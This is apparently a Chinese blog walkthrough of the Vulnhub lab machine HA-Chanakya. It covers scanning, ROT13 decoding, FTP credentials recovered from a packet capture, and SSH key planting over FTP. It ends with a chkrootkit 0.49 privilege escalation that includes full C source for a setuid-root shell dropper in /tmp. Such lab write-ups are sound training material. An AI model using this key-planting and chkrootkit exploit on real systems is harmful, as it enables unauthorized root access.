HA-Chanakya

Vulnhub靶场

下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/

背景:

摧毁王国的策划者又回来了,这次他创造了一个难题,会让你挠头!是时候面对Chanakya。

您能否解决这个“从根本上启动”并证明自己更明智?

枚举是关键!!!!

 

 

 

首页:

全端口扫描

尝试匿名登录FTP

目录扫描

http://192.168.136.179/assets/

对里面的文件进行查看,是字体库。

这里实在没有发现什么,只能换大字典fuzz跑文件了,抓数据包,设置爆破点。

第一个点用了top10000,第二个点是常见后缀。

设置线程为999,跑了10多分钟,终于有了个文件。(字典取至dirmap)

http://192.168.136.179/abuse.txt

SSH、FTP的密码都不对,如果不是密码就可能是个文件吧。

http://192.168.136.179/nfubxn.cpncat没有该文件。

如果是加密文件应该就是错位等加密方法吧,试试栅栏密码、凯撒密码等。

凯撒密码加密偏移量为13。

http://192.168.136.179/ashoka.pcapng

Wireshark的流量包的格式

发现FTP的数据流含有账号密码且显示的是登陆成功。

ashoka:kautilya

依次访问没有发现可用的信息。

但显示的内容像是在用户路径下的隐藏文件,该ftp的目录可能就是ashoka用户的目录。

而且ftp运行新建文件夹和上传文件。

所以可以设置SSH免密登录,将文件上传到.ssh的文件夹下。

在kali上设置,刚开始使用了DSA 密钥。

ssh-keygen -t dsa

cd ~/.ssh/

cp id_dsa.pub authorized_keys

然后将authorized_keys上传到ftp的.ssh路径下。

连接ssh。

没有成功,中途多次修改了/etc/ssh/sshd_config的配置文件以及权限的修改也没能成功。

查阅资料发现:

使用了RSA 密钥试试,

这里如果不设置密码就三个回车,将会在.ssh文件夹下生成公钥(id_rsa.pub)和私钥(id_rsa),将公钥(id_rsa.pub)复制为authorized_keys并上传到ftp的.ssh文件夹下。

而且,这里的权限我也没有修改到700,保持的600权限。

ssh ashoka@192.168.136.179。这里也可以将id_rsa.pub文件下载利用Xshell等软件连接。

find / -user root -perm -4000 -print 2>/dev/null       查询suid文件

sudo -l       显示出自己(执行 sudo 的使用者)的权限

find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null     查询777权限文件

下载cha.zip,发现里面是网站的备份数据。

也没有什么用,翻来翻去,在/tmp下发现logs。

cat logs

百度看看这是什么文件。

是入侵检测工具chkrootkit生成的运行结果。

而且还是本地提权,就是他了。

find -name chkrootkit*  2>/dev/null       查询chkrootkit文件

查看chkrootkit的版本。

./chkrootkit -V

该版本存在漏洞。

同时,该漏洞要实现还需要能够运行chkrootkit,使它去调用update文件。

查看crontab -u root -l。没有权限,应该是有运行chkrootkit计划的。

在kali中新建一个update.c的文件,并写入下面的数据。

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

文件内容是利用chkrootkit将update文件属性修改为root:root,并给予任何人执行权限,当ashoka执行该文件时就能获取root的shell。

在kali下编译文件gcc update.c -o update

然后将update拷到ashoka的/tmp/下。

拷进去后,利用chkrootkit 0.49漏洞原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。从而使文件获取root权限,接下来运行该文件可提权。(所以上图的update才会从ashoka变为root)

这里我刚拷update进去不一会就变成root了。

运行./update

验证下crontab -l。每分钟运行一次chkrootkit并将结果返回到/tmp/logs。

-- Ly_Dargo

最新文章

  1. Mac系统下显示和隐藏文件
  2. 迅美VPS安装和配置MySQL数据库教程
  3. Java实现单向链表的增删改查
  4. 【CodeForces】【321E】Ciel and Gondolas
  5. asp.net后台获取前台的样式和后台给前台设置样式
  6. springmvc获得项目根目录(绝对路径)
  7. UESTC_握手 CDOJ 913
  8. 出现java.lang.reflect.UndeclaredThrowableException异常
  9. Code Kata:螺旋矩阵 javascript实现
  10. python全栈开发-re模块(正则表达式)应用(字符串的处理)
  11. Vue之添加全局变量
  12. Fisher–Yates shuffle 算法
  13. Hibernate简答题
  14. 转://Oracle补丁及opatch工具介绍
  15. Linux gcc编译之-std选项
  16. tRNAscan-SE 预测tRNA基因
  17. Redis学习七:Redis的持久化-总结(Which one)
  18. mysql_use_result的使用
  19. ThinkPHP5入门(二)----控制器篇
  20. python __new__和__init__

热门文章

  1. C语言把整数转换为字符串
  2. JavaScript-原始值和引用值
  3. 【Linux】Linux(一)Linux常用命令
  4. Taro Next H5 跨框架组件库实践
  5. pyecharts的使用及总结
  6. JQUERY滚动加载
  7. ffmpeg使用ss与t参数对视频进行剪辑
  8. break与continue对比
  9. Springboot系列(七) 集成接口文档swagger,使用,测试
  10. C# windows服务没有RunInstallerAttribute.Yes的公共安装程序